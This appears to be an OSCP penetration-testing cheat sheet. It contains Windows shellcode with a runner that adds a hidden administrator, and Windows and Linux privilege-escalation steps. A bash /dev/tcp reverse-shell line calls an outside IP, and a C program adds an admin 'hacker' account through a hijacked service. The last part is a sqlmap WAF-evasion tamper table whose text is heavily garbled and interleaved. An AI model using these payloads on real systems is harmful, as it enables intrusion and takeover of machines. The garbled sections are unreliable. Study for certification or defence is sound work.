CheatSheets OSCP

Download as xlsx, pdf, or txt
Download as xlsx, pdf, or txt
You are on page 1of 286

Add Admin User Shellcode (194 bytes) - Any Windows Version

-----------------

Title: Add Admin User Shellcode (194 bytes) - Any Windows Version
Tested on: Win8,Win7,WinVista,WinXP,Win2kPro,Win2k8,Win2k8R2,Win2k3
Username: BroK3n
Password: BroK3n
-----------------
char shellcode[] = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03
\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b
\x34\xaf\x01\xc6\x45\x81\x3e\x57\x69\x6e\x45\x75\xf2\x8b\x7a
\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf
\xfc\x01\xc7\x68\x4b\x33\x6e\x01\x68\x20\x42\x72\x6f\x68\x2f
\x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69
\x6e\x69\x73\x68\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63
\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44
\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x72\x6f\x4b\x33\x68\x33
\x6e\x20\x42\x68\x42\x72\x6f\x4b\x68\x73\x65\x72\x20\x68\x65
\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63
\x6d\x64\x2e\x89\xe5\xfe\x4d\x53\x31\xc0\x50\x55\xff\xd7;

int main(int argc, char **argv){int (*f)();f = (int (*)())shellcode;(int)(*f)();}


immediately this can still give short window to an attacker to exploit a vulnerability and
escalate his privileges inside a system and therefore inside the network.
This article will discuss how to identify missing patches related to privilege escalation
and the necessary code to exploit the issue.

Discoveryorofautomatic.
methods Missing Patches
Manually this can be done easily be executing the following
command which will enumerate all the installed patches.

$ wmic qfe get Caption,Description,HotFixID,InstalledOn

The output will be similar to this:


missing patches related to privilege escalation. As the focus is on privilege escalation
the command can be modified slightly to discover patches based on the KB number.
$ wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3136041"
/C:"KB4018483"
Alternatively this can be done automatically via Metasploit, Credential Nessus Scan or
via a custom script that will look for missing patches related to privilege escalation.

Metasploit
the Knowledge Base number and specifically patches for which there is a Metasploit
module.

$ post/windows/gather/enum_patches

Windows Exploit Suggester


and can be used to identify those exploits that could lead to privilege escalation. The
only requirement is that requires the system information from the target.

PowerShell
Sherlock(https://github.com/rasta-mouse/Sherlock) and it will check a system for the
following:

MS10-015 : User Mode to Ring (KiTrap0D)


MS10-092 : Task Scheduler
MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
MS13-081 : TrackPopupMenuEx Win32k NULL Page
MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
MS15-051 : ClientCopyImage Win32k
MS15-078 : Font Driver Buffer Overflow
MS16-016 : ‘mrxdav.sys’ WebDAV
MS16-032 : Secondary Logon Handle
CVE-2017-7199 : Nessus Agent 6.6.2 – 6.10.3 Priv Esc
Privilege
The Escalation
following Table
table has been compiled to assist in the process of privilege escalation
due to lack of sufficient patching.

Operating System
Windows Server 2016
Windows Server 2008 ,7,8,10 Windows Server 2012
Windows Server 2008, Vista, 7
Windows Server 2003, Windows Server 2008, Windows 7, Windows 8, Windows 2012
Windows Server 2003, Windows Server 2008, Windows Server 2012, 7, 8
Windows Server 2003, Windows Server 2008, 7, 8, Windows Server 2012
Windows XP, Windows Server 2003
Windows Server 2003, Windows Server 2008, 7, 8, Windows Server 2012
Windows Server 2008, 7
Windows Server 2003, Windows Server 2008, 7, XP
Windows Server 2003, XP
Windows Server 2003, Windows Server 2008, 7, 8, Windows Server 2012
Windows Server 2003, XP
Windows Server 2003, XP
Windows Server 2003, Windows Server 2008, 7, 8, Windows Server 2012
Windows Server 2003, Windows Server 2008, 7, 8, Windows Server 2012
Windows Server 2003, Windows Server 2008, 7, XP
Windows Server 2003, Windows Server 2008, 7, XP
Description Security Bulletin KB
Windows Kernel Mode Drivers MS16-135 3199135
Secondary Logon Handle MS16-032 3143141
WebDAV MS16-016 3136041
Windows Kernel Mode Drivers MS15-051 3057191
Win32k.sys MS14-058 3000061
AFD Driver MS14-040 2975684
Windows Kernel MS14-002 2914368
Kernel Mode Driver MS13-005 2778930
Task Scheduler MS10-092 2305420
KiTrap0D MS10-015 977165
NDProxy MS14-002 2914368
Kernel Driver MS15-061 3057839
AFD.sys MS11-080 2592799
NDISTAPI MS11-062 2566454
RPC MS15-076 3067505
Hot Potato MS16-075 3164038
Kernel Driver MS15-010 3036220
AFD.sys MS11-046 2503665
Exploit
Exploit
Github
ExploitDB
Metasploit
Github
ExploitDB
Metasploit
ExploitDB
Metasploit
ExploitDB
Github
Metasploit
ExploitDB
GitHub
Metasploit
ExploitDB
GitHub
Metasploit
ExploitDB
Github
Github
Metasploit
ExploitDB
ExploitDB
Github
PowerShell
HotPotato
GitHub
ExploitDB
EXE
ExploitDB
############LINUX#####################
research the target machine on linux
using uname -a determine the kernel and see if there is a know privilege escalation
www.exploit-db.com/exploits/18411/
download in target machine --- notes potential machine ip ends with 240
compile
gcc exploit.c -o exploit
run it done ;D you got root privileges
read the lab guide for more references video 82

SEARCHIVNG FOR SERVICES WITH MISCONFIGURE PERMISSION


#run this command to find said services aka file with root privileges and read and writable by low priv user
find / -perm -2 ! -type l -ls 2>/dev/null
#modify said script to run the following command that establishes a reverse shell to your machine
bash -i >& /dev/tcp/192.168.13.220/443 0>&1
#setup a listener in your machine nc -lvp 443
nc -lvp 443

sometimes escalation priviliges


relies in files that contain password
group policiy config files
unatended installation
or badly wrriten scripts that contain password in it

###############WINDOWS#####################
notes on privilege escalation in windows
ms011 this bug is classic example user mode to windows kernel with uncheckbuffer overwrite kernel space.
gain system level execution windows xp and windows 2003 32bit and 64.
python exploit
www.exploit-db.com/exploits/18176/
install the dependencies needed in the tools directory aka py installer and other file in tools folder
then copy the exploit to that folder and compile

python pyinstaller.py --onefile ms11-080.py


create it into an exe in case you dont have python libraries install
login to a 2k3
check to see if you have admin priviliges after executing it by using:
whoami

create a new windows user


net user hacker hacker /add
net localgroup administrators hacker /add #add to administators group

updates reduce

adminstrative error
mishandling file and folder user permission allow privilege ecalation
windows service
doesn't take care file permission full and read and write access to service
the malicious file executed with system privilege

#lab example
net user lowpriv mypass /add
net localgroup "Remote Desktop users" lowpriv /add

check a services.msc
services.smc

integrity controlist
icacls on the service exe
to check if the services is Everyone and Administrators
scsiaccess.exe NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
Everyone:(CI)(F)

abuse this by running c program using the linux crosscompiler

//compilethiscode i586-mingw32msvc-gcc useradd.c -o useradd.exe


//useradd.c
#include <stdlib.h>
int main()
{
int i;
i=system("net localgroup administrators lowpriv /add");
i=system("net user hacker hacker /add");
i=system("net localgroup administrators hacker /add");
i=system("net localgroup \"Remote Desktop users\" hacker /add");
return 0;
}
by low priv user

rite kernel space.


SQLMAP DEFAULT TAMPER SCRIPTS
TAMPER SCRIPT REQUERIMENTS / TESTED against
apostrophemask UNIVERSAL \ NOT DESCRIBED
apostrophenullencode UNIVERSAL \ NOT DESCRIBED
appendnullbyte Microsoft Access \ TEST FURTHER
base64encode UNIVERSAL \ NOT DESCRIBED
Microsoft SQL Server 2005
between
between MySQL 4
between MySQL 5.0
between Oracle 10g
between PostgreSQL 8.3
between PostgreSQL 8.4
between PostgreSQL 9.0
between MySQL 5.5
bluecoat MySQL 5.1
bluecoat SGOS
chardoubleencode UNIVERSAL \ NOT DESCRIBED
charencode Microsoft SQL Server 2005
charencode MySQL 4
charencode MySQL 5.0
charencode MySQL 5.5
charencode Oracle 10g
charencode PostgreSQL 8.3
charencode PostgreSQL 8.4
charencode PostgreSQL 9.0
charunicodeencode ASP
charunicodeencode ASP.NET
charunicodeencode Microsoft SQL Server 2000
Microsoft SQL Server 2005
charunicodeencode
charunicodeencode MySQL 5.1.56
charunicodeencode PostgreSQL 9.0.3
charunicodeescape UNIVERSAL \ NOT DESCRIBED
commalesslimit MySQL
commalesslimit MySQL 5.0
commalesslimit MySQL 5.5
commalessmid MySQL
commalessmid MySQL 5.0
commalessmid MySQL 5.5
commentbeforeparentheses Microsoft SQL Server
commentbeforeparentheses MySQL
commentbeforeparentheses Oracle
commentbeforeparentheses PostgreSQL
concat2concatws MySQL
concat2concatws MySQL 5.0
Microsoft SQL Server 2005
equaltolike
equaltolike MySQL 4
equaltolike MySQL 5
equaltolike MySQL 5.5
escapequotes UNIVERSAL \ NOT DESCRIBED
greatest MySQL 4
greatest MySQL 5
greatest MySQL 5.5
greatest Oracle 10g
greatest PostgreSQL 8.3
greatest PostgreSQL 8.4
greatest PostgreSQL 9.0
halfversionedmorekeywords MySQL < 5.1
halfversionedmorekeywords MySQL 4.0.18
halfversionedmorekeywords MySQL 5.0.22
htmlencode UNIVERSAL \ NOT DESCRIBED
ifnull2ifisnull MySQL 5.0
ifnull2ifisnull MySQL 5.5
informationschemacomment UNIVERSAL \ NOT DESCRIBED
least MySQL 4
least MySQL 5
least MySQL 5.5
least Oracle 10g
least PostgreSQL 8.3
least PostgreSQL 8.4
least PostgreSQL 9.0
Microsoft SQL Server 2005
lowercase
lowercase MySQL 4
lowercase MySQL 5.0
lowercase MySQL 5.5
lowercase Oracle 10g
lowercase PostgreSQL 8.3
lowercase PostgreSQL 8.4
lowercase PostgreSQL 9.0
modsecurityversioned MySQL
modsecurityversioned MySQL 5.0
multiplespaces UNIVERSAL \ NOT DESCRIBED
nonrecursivereplacement UNIVERSAL \ NOT DESCRIBED
overlongutf8 UNIVERSAL \ NOT DESCRIBED
percentage ASP
percentage Microsoft SQL Server 2000
Microsoft SQL Server 2005
percentage
percentage MySQL 5.1.56
percentage MySQL 5.5.11
percentage PostgreSQL 9.0
plus2concat Microsoft SQL Server 2012
plus2concat Microsoft SQL Server 2012+
plus2fnconcat Microsoft SQL Server 2008
plus2fnconcat Microsoft SQL Server 2008+
Microsoft SQL Server 2005
randomcase
randomcase MySQL 4
randomcase MySQL 5
randomcase MySQL 5.5
randomcase Oracle 10g
randomcase PostgreSQL 8.3
randomcase PostgreSQL 8.4
randomcase PostgreSQL 9.0
randomcomments UNIVERSAL \ NOT DESCRIBED
securesphere UNIVERSAL \ NOT DESCRIBED
sp_password MSSQL
Microsoft SQL Server 2005
space2comment
space2comment MySQL 4
space2comment MySQL 5
space2comment MySQL 5.5
space2comment Oracle 10g
space2comment PostgreSQL 8.3
space2comment PostgreSQL 8.4
space2comment PostgreSQL 9.0
space2dash MSSQL
space2dash SQLite
space2hash MySQL
MySQL 4.0
space2hash
MySQL 5.0
space2hash
space2morecomment MySQL 5.0
space2morecomment MySQL 5.5
space2morehash MySQL >= 5.1.13
space2morehash MySQL 5.1.41
space2mssqlblank Microsoft SQL Server
space2mssqlblank Microsoft SQL Server 2000
Microsoft SQL Server 2005
space2mssqlblank
space2mssqlhash MSSQL
space2mssqlhash MySQL
space2mysqlblank MySQL
space2mysqlblank MySQL 5.1
space2mysqldash MySQL
space2mysqldash MSSQL
space2plus UNIVERSAL \ NOT DESCRIBED
Microsoft SQL Server 2005
space2randomblank
space2randomblank MySQL 4.0
MySQL 5.0
space2randomblank
MySQL 5.5
space2randomblank
symboliclogical UNIVERSAL \ NOT DESCRIBED
unionalltounion UNIVERSAL \ NOT DESCRIBED
unmagicquotes UNIVERSAL \ NOT DESCRIBED
uppercase Microsoft SQL Server 2005
MySQL 4.0
uppercase
MySQL 5.0
uppercase
uppercase MySQL 5.5
uppercase PostgreSQL 8.3
uppercase PostgreSQL 8.4
uppercase PostgreSQL 9.0
varnish UNIVERSAL \ NOT DESCRIBED
versionedkeywords MySQL
versionedkeywords MySQL 4.0.18
versionedkeywords MySQL 5.1.56
versionedkeywords MySQL 5.5.11
versionedmorekeywords MySQL >= 5.1.13
versionedmorekeywords MySQL 5.1.56
versionedmorekeywords MySQL 5.5.11
xforwardedfor UNIVERSAL \ NOT DESCRIBED
SQLMAP DEFAULT TAMPER SCRIPTS USAGE
NOTES \ TIPS
Replaces apostrophe character with its UTF-8 full width counterpart
Replaces apostrophe character with its illegal double unicode
counterpart
Useful to bypass weak web application firewalls when the back-end
database management
Base64 encode systeminisa Microsoft
all characters Access - further uses are
given payload

Replaces space character after SQL statement with a valid random


blank character.
Replaces Afterwards
space character replace
after character with
SQL statement = witha valid
LIKE operator
random
blank character. Afterwards replace character = with LIKE
Double url-encodes all characters in a given payload (not processingoperator
already
Useful toencoded) * Useful
bypass very weaktowebbypass some weak
application web that
firewalls application
do not url-
decode the request before processing it through their ruleset.
Useful to bypass very weak web application firewalls that do not Theurl-
decode the request before processing it through their ruleset.
Useful to bypass very weak web application firewalls that do not url- The
decode
Useful tothe request
bypass verybefore
weak processing it through
web application theirthat
firewalls ruleset. The
do not url-
decode the request before processing it through their ruleset.
Useful to bypass very weak web application firewalls that do not url- The
decode
Useful tothe request
bypass verybefore
weak processing it through
web application theirthat
firewalls ruleset. The
do not url-
decode the request before processing it through their ruleset.
Useful to bypass very weak web application firewalls that do not url- The
decode
Useful tothe request
bypass verybefore
weak processing it through
web application theirthat
firewalls ruleset. The
do not url-
decode the request before processing it through their ruleset.
Useful to bypass weak web application firewalls that do not unicode The
url-decode the request
Useful to bypass before
weak web processing
application it through
firewalls that their
do notruleset
unicode
url-decode the request
Useful to bypass before
weak web processing
application it through
firewalls that their
do notruleset
unicode
url-decode the request before processing it through their
Useful to bypass weak web application firewalls that do not unicode ruleset
url-decode the request
Useful to bypass before
weak web processing
application it through
firewalls that their
do notruleset
unicode
url-decode the request before processing it through their
Useful to bypass weak web application firewalls that do not unicode ruleset
url-decode the request
Useful to bypass before processing
weak filtering and/or WAFs it through
in JSON their ruleset
contexes,
Unicode-escapes
Replaces instances non-encoded
like 'LIMIT M, characters in a given
N' with 'LIMIT payload
N OFFSET M' (not
Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'
Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'
Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'
Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'
Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'
Useful to bypass web application firewalls that block usage of function
calls
Useful to bypass web application firewalls that block usage of function
calls
Useful to bypass web application firewalls that block usage of function
calls
Useful to bypass web application firewalls that block usage of function
calls
Useful to bypass very weak and bespoke web application firewalls that
filter
Usefultheto CONCAT() function
bypass very weak and bespoke web application firewalls that
Useful to bypass weak and bespoke web application firewalls that filter the equal character ('=') The LIKE operator is SQL stan
filter the CONCAT() function
Useful to bypass weak and bespoke web application firewalls that filter the equal character ('=') The LIKE operator is SQL stan
Useful to bypass weak and bespoke web application firewalls that filter the equal character ('=') The LIKE operator is SQL stan
Useful to bypass weak and bespoke web application firewalls that filter the equal character ('=') The LIKE operator is SQL stan

Slash escape quotes (' and ")


Replaces greater than operator ('>') with 'GREATEST' counterpart. Useful to bypass weak and bespoke web application firewa
Replaces greater than operator ('>') with 'GREATEST' counterpart. Useful to bypass weak and bespoke web application firewa
Replaces greater than operator ('>') with 'GREATEST' counterpart. Useful to bypass weak and bespoke web application firewa
Replaces greater than operator ('>') with 'GREATEST' counterpart. Useful to bypass weak and bespoke web application firewa
Replaces greater than operator ('>') with 'GREATEST' counterpart. Useful to bypass weak and bespoke web application firewa
Replaces greater than operator ('>') with 'GREATEST' counterpart. Useful to bypass weak and bespoke web application firewa
Replaces greater than operator ('>') with 'GREATEST' counterpart. Useful to bypass weak and bespoke web application firewa
Adds versioned MySQL comment before each keyword. Useful to
bypass several web
Adds versioned MySQLapplication
comment firewalls
before when the back-end
each keyword. database
Useful to
bypass several web application firewalls when the back-end
Adds versioned MySQL comment before each keyword. Useful to database
bypass several(using
HTML encode web application
code points)firewalls when the back-end
all non-alphanumeric database
characters
Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' Useful
to bypassinstances
Replaces very weaklike
and'IFNULL(A,
bespoke web application
B)' with firewalls
'IF(ISNULL(A), that
B, A)' filter
Useful
to bypass
Add very weak
a comment and
to the end bespoke web application
of all occurrences firewalls that filter
of (blacklisted)
"information_schema" identifier
Useful to bypass weak and bespoke web application firewalls that filter the greater than character. The LEAST clause is a wide
Useful to bypass weak and bespoke web application firewalls that filter the greater than character. The LEAST clause is a wide
Useful to bypass weak and bespoke web application firewalls that filter the greater than character. The LEAST clause is a wide
Useful to bypass weak and bespoke web application firewalls that filter the greater than character. The LEAST clause is a wide
Useful to bypass weak and bespoke web application firewalls that filter the greater than character. The LEAST clause is a wide
Useful to bypass weak and bespoke web application firewalls that filter the greater than character. The LEAST clause is a wide
Useful to each
Replaces bypass weak and
keyword bespoke
character web
with application
lower firewalls
case value. Usefulthat
to filter
bypassthevery
greater
weakthan
and character.
bespoke webTheapplication
LEAST clause is a wide
firewalls th
Replaces each keyword character with lower case value. Useful to bypass very weak and bespoke web application firewalls th
Replaces each keyword character with lower case value. Useful to bypass very weak and bespoke web application firewalls th
Replaces each keyword character with lower case value. Useful to bypass very weak and bespoke web application firewalls th
Replaces each keyword character with lower case value. Useful to bypass very weak and bespoke web application firewalls th
Replaces each keyword character with lower case value. Useful to bypass very weak and bespoke web application firewalls th
Replaces each keyword character with lower case value. Useful to bypass very weak and bespoke web application firewalls th
Replaces each keyword character with lower case value. Useful to bypass very weak and bespoke web application firewalls th

Embraces complete query with versioned comment. Useful to bypass


ModSecurity WAF/IDS
Useful to bypass ModSecurity WAF/IDS
Adds multiple spaces around SQL keywords. Useful to bypass very
weak and bespoke web application firewalls that has poorly written
Replaces predefined SQL keywords with representations suitable for
replacement (e.g. .replace("SELECT",
Converts all characters "")) filters.
in a given payload Useful to bypass
(not processing alreadyvery
encoded) Reference:
Adds a percentage sign ('%') infront of each character. Useful to
bypass weak and bespoke
Adds a percentage sign ('%') web application
infront of eachfirewalls
character. Useful to
bypass weak and bespoke web application firewalls
Adds a percentage sign ('%') infront of each character. Useful to
bypass weak and bespoke
Adds a percentage sign ('%')web application
infront of eachfirewalls
character. Useful to
bypass weak and bespoke web application firewalls
Adds a percentage sign ('%') infront of each character. Useful to
bypass weak and bespoke
Adds a percentage sign ('%')web application
infront of eachfirewalls
character. Useful to
bypass weak and bespoke web application firewalls
Replaces plus ('+') character with function CONCAT(). Useful in case
('+') character
Replaces is filtered.
plus ('+') character with function CONCAT(). Useful in case
('+') character is filtered.
Replaces plus ('+') character with ODBC function {fn CONCAT()}. Useful
in case ('+')
Replaces character
plus is filtered
('+') character with ODBC function {fn CONCAT()}. Useful
in case ('+') character is filtered

Add random comments to SQL keywords.


Appends special crafted string. Useful for bypassing Imperva SecureSphere WAF. Reference: http://seclists.org/fulldisclosure
Appends 'sp_password' to the end of the payload for automatic
obfuscation from
Replaces space DBMS logs.
character Appending
(' ') with commentssp_password to the
'/**/' Useful end of
to bypass
weak andspace
Replaces bespoke web application
character firewalls '/**/' Useful to bypass
(' ') with comments
weak andspace
Replaces bespoke web application
character firewalls '/**/' Useful to bypass
(' ') with comments
weak andspace
Replaces bespoke web application
character firewalls '/**/' Useful to bypass
(' ') with comments
weak andspace
Replaces bespoke web application
character firewalls '/**/' Useful to bypass
(' ') with comments
weak andspace
Replaces bespoke web application
character firewalls '/**/' Useful to bypass
(' ') with comments
weak and bespoke web application firewalls '/**/' Useful to bypass
Replaces space character (' ') with comments
weak andspace
Replaces bespoke web application
character firewalls '/**/' Useful to bypass
(' ') with comments
weak andspace
Replaces bespoke web application
character (' ') with afirewalls
dash comment ('--') followed by a
Replaces space character (' ') with
random string and a new line ('\n').a Useful
dash comment
to bypass('--') followed
several web by a random string and a new line ('\n').

Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n'). Useful to bypass
Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n'). Useful to bypass
Replaces space
Replaces space character
character ('
(' ')
') with
with comments
a pound character ('#')
'/**_**/' followed
Useful by a random
to bypass string
weak and and a web
bespoke new application
line ('\n'). Useful to bypass
firewalls
Replaces space character (' ') with comments '/**_**/' Useful to bypass weak and bespoke web application firewalls

Replaces space character (' ') with a pound character ('#') followed by
aUseful
random string and
to bypass a new
several web line ('\n')
application firewalls. Used during the
Replaces space character (' ') with
ModSecurity SQL injection challenge a random blank character from a valid set of alternate characters.
Replaces space character (' ') with a random blank character from a valid set of alternate characters.
Replaces space character (' ') with a random blank character from a valid set of alternate characters.

Replaces space character (' ') with a pound character ('#') followed by a new line ('\n'). Useful to bypass several web applicati
Replaces space
Replaces space character
character ('
(' ')
') with
with aa random
pound character ('#') followed
blank character from aby a new
valid set line ('\n'). Useful
of alternate to bypass several web applicati
characters.
Replaces space character (' ') with a random blank character from a valid set of alternate characters.

Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n'). Useful to bypass several web applicatio
Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n'). Useful to bypass several web applicatio
Replaces space character (' ') with plus ('+'). Is this any useful? The plus get's url-encoded by sqlmap engine invalidating the q

Replaces AND and OR logical operators with their symbolic


counterparts (&&ALL
Replaces UNION andSELECT
||) with UNION SELECT
Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work).
Replaces each keyword character with upper case value. Useful to bypass very weak and bespoke web application firewalls th
Replaces each keyword character with upper case value. Useful to bypass very weak and bespoke web application firewalls th
Replaces each keyword character with upper case value. Useful to bypass very weak and bespoke web application firewalls th
Replaces each keyword character with upper case value. Useful to bypass very weak and bespoke web application firewalls th
Replaces each keyword character with upper case value. Useful to bypass very weak and bespoke web application firewalls th
Replaces each keyword character with upper case value. Useful to bypass very weak and bespoke web application firewalls th
Replaces each keyword character with upper case value. Useful to bypass very weak and bespoke web application firewalls th

Append a HTTP header 'X-originating-IP' to bypass WAF Protection of


Varnish
EnclosesFirewall Reference: http://h30499.www3.hp.com/t5/Fortify-
each non-function keyword with versioned MySQL comment.
Useful to bypass several web application
Encloses each non-function keyword withfirewalls when
versioned the back-end
MySQL comment.
Useful to bypass several web application firewalls when the back-end
Encloses each non-function keyword with versioned MySQL comment.
Useful toeach
Encloses bypass several webkeyword
non-function application
withfirewalls when
versioned the back-end
MySQL comment.
Useful to bypass several web application firewalls when the
Encloses each keyword with versioned MySQL comment. Useful to back-end
bypass
Enclosesseveral web application
each keyword firewallsMySQL
with versioned when comment.
the back-end database
Useful to
bypass several web application firewalls when the back-end
Encloses each keyword with versioned MySQL comment. Useful to database
bypass
Appendseveral web application
a fake HTTP firewalls when the
header 'X-Forwarded-For' back-end database
to bypass
WAF (usually application based) protection
INJECT EXAMPLE
>>> tamper("1 AND '1'='1")
'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
>>> tamper("1 AND '1'='1")
'1 AND
>>>%00%271%00%27=%00%271'
tamper('1 AND 1=1')
'1 ANDAND
>>> tamper("1' 1=1%00'
SLEEP(5)#")
'MScgQU5EIFNMRUVQKDUpIw=='
>>> tamper('1 AND A > B--')
'1 AND A NOT BETWEEN
>>> tamper('1 AND A >0B--')
AND B--'
'1 AND A NOT BETWEEN
>>> tamper('1 AND A >0B--')
AND B--'
'1 AND A NOT BETWEEN
>>> tamper('1 AND A >0B--')
AND B--'
'1 AND A NOT BETWEEN 0 AND B--'
>>> tamper('1 AND A > B--')
'1 AND A NOT BETWEEN
>>> tamper('1 AND A >0B--')
AND B--'
'1 AND A NOT BETWEEN
>>> tamper('1 AND A >0B--')
AND B--'
'1 AND A NOT BETWEEN
>>> tamper('1 AND A >0B--')
AND B--'
'1 AND A NOT
>>> tamper('SELECT BETWEEN
id FROM 0 AND
users WHEREB--'id = 1')
'SELECT%09id
>>> FROM%09users
tamper('SELECT WHERE%09id
id FROM users WHERE idLIKE= 1')1'
'SELECT%09id FROM%09users
>>> tamper('SELECT WHERE%09id LIKE 1'
FIELD FROM%20TABLE')
'%2553%2545%254C
>>> tamper('SELECT FIELD FROM%20TABLE')
'%53%45%4C%45%43%54%20%46%49%45%4C
>>> tamper('SELECT FIELD FROM%20TABLE')
'%53%45%4C%45%43%54%20%46%49%45%4C
>>> tamper('SELECT FIELD FROM%20TABLE')
'%53%45%4C%45%43%54%20%46%49%45%4C
>>> tamper('SELECT FIELD FROM%20TABLE')
'%53%45%4C%45%43%54%20%46%49%45%4C
>>> tamper('SELECT FIELD FROM%20TABLE')
'%53%45%4C%45%43%54%20%46%49%45%4C
>>> tamper('SELECT FIELD FROM%20TABLE')
'%53%45%4C%45%43%54%20%46%49%45%4C
>>> tamper('SELECT FIELD FROM%20TABLE')
'%53%45%4C%45%43%54%20%46%49%45%4C
>>> tamper('SELECT FIELD FROM%20TABLE')
'%53%45%4C%45%43%54%20%46%49%45%4C
>>> tamper('SELECT FIELD%20FROM TABLE')
'%u0053%u0045%u004C
>>> tamper('SELECT FIELD%20FROM TABLE')
'%u0053%u0045%u004C
>>> tamper('SELECT FIELD%20FROM TABLE')
'%u0053%u0045%u004C
>>> tamper('SELECT FIELD%20FROM TABLE')
'%u0053%u0045%u004C
>>> tamper('SELECT FIELD%20FROM TABLE')
'%u0053%u0045%u004C
>>> tamper('SELECT FIELD%20FROM TABLE')
'%u0053%u0045%u004C
>>> tamper('SELECT FIELD FROM TABLE')
'\\\\u0053\\\\u0045\\\\u004C\\\\u0045\\\\u0043\\\\
>>> tamper('LIMIT 2, 3')
>>> 'LIMIT 3 OFFSET2,2'3')
tamper('LIMIT
'LIMIT 3 OFFSET 2' 1, 1)')
>>> tamper('MID(VERSION(),
>>>'MID(VERSION() FROM 1 FOR
tamper('MID(VERSION(), 1)'
1, 1)')
>>>'MID(VERSION() FROM 1 FOR
tamper('MID(VERSION(), 1)'
1, 1)')
'MID(VERSION() FROM
>>> tamper('SELECT 1 FOR 1)'
ABS(1)')
'SELECT ABS/**/(1)'
>>> tamper('SELECT ABS(1)')
'SELECT ABS/**/(1)'
>>> tamper('SELECT ABS(1)')
'SELECT ABS/**/(1)'
>>> tamper('SELECT ABS(1)')
'SELECT ABS/**/(1)'
>>> tamper('CONCAT(1,2)')
'CONCAT_WS(MID(CHAR(0),0,0),1,2)'
>>> tamper('CONCAT(1,2)')
'CONCAT_WS(MID(CHAR(0),0,0),1,2)'
>>> tamper('SELECT * FROM users WHERE id=1')
'SELECT * FROM
>>> tamper('SELECT users WHERE
* FROM id LIKE id=1')
users WHERE 1'
'SELECT * FROM
>>> tamper('SELECT users WHERE
* FROM id LIKE id=1')
users WHERE 1'
'SELECT * FROM
>>> tamper('SELECT users WHERE
* FROM id LIKE id=1')
users WHERE 1'
'SELECT * FROM users
>>> tamper('1" ANDWHERE id LIKE 1'
SLEEP(5)#')
>>>'1\\\\" AND AND
tamper('1 SLEEP(5)#'
A > B')
'1 AND GREATEST(A,B+1)=A'
>>> tamper('1 AND A > B')
'1 AND
>>> GREATEST(A,B+1)=A'
tamper('1 AND A > B')
'1 AND GREATEST(A,B+1)=A'
>>> tamper('1 AND A > B')
'1 AND
>>> GREATEST(A,B+1)=A'
tamper('1 AND A > B')
'1 AND GREATEST(A,B+1)=A'
>>> tamper('1 AND A > B')
'1 AND
>>> GREATEST(A,B+1)=A'
tamper('1 AND A > B')
'1 AND GREATEST(A,B+1)=A'
>>> tamper("value' UNION ALL SELECT
CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_US
>>> tamper("value' UNION ALL SELECT
CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_US
>>> tamper("value' UNION ALL SELECT
CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_US
>>> tamper("1' AND SLEEP(5)#")
'1&#39;&#32;AND&#32;SLEEP&#40;5&#41;&#35;'
>>> tamper('IFNULL(1, 2)')
'IF(ISNULL(1),2,1)'2)')
>>> tamper('IFNULL(1,
'IF(ISNULL(1),2,1)'
>>> tamper('SELECT table_name FROM
INFORMATION_SCHEMA.TABLES')
>>> tamper('1 AND A > B')
'1 AND
>>> LEAST(A,B+1)=B+1'
tamper('1 AND A > B')
'1 AND LEAST(A,B+1)=B+1'
>>> tamper('1 AND A > B')
'1 AND
>>> LEAST(A,B+1)=B+1'
tamper('1 AND A > B')
'1 AND LEAST(A,B+1)=B+1'
>>> tamper('1 AND A > B')
'1 AND
>>> LEAST(A,B+1)=B+1'
tamper('1 AND A > B')
'1 AND LEAST(A,B+1)=B+1'
>>> tamper('1 AND A > B')
'1>>>
ANDtamper('INSERT')
LEAST(A,B+1)=B+1'
'insert'
>>> tamper('INSERT')
'insert'
>>> tamper('INSERT')
'insert'
>>> tamper('INSERT')
'insert'
>>> tamper('INSERT')
'insert'
>>> tamper('INSERT')
'insert'
>>> tamper('INSERT')
'insert'
>>> tamper('INSERT')
'insert'
>>> import random
>>> random.seed(0)
>>> import random
>>>random.seed(0)
>>> random.seed(0)
>>> tamper('1 UNION SELECT foobar')
>>> random.seed(0)
>>> tamper('1
>>> tamper('SELECT FIELDUNION
FROM SELECT 2--') 2>1')
TABLE WHERE
'SELECT%C0%AAFIELD%C0%AAFROM%C0%AATABLE
>>> tamper('SELECT FIELD FROM TABLE')
'%S%E%L%E%C%T %F%I%E%L%D
>>> tamper('SELECT FIELD%F%R%O%M
FROM TABLE')%T%A%B%L
'%S%E%L%E%C%T %F%I%E%L%D
